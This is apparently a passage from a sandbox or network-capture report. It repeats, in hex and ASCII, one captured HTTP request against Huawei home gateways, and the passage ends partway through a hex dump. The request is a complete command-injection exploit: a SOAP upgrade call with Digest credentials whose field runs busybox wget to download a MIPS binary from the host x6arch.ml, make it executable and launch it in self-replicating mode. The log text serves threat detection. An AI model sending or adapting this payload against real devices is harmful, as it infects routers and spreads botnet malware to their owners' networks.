2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 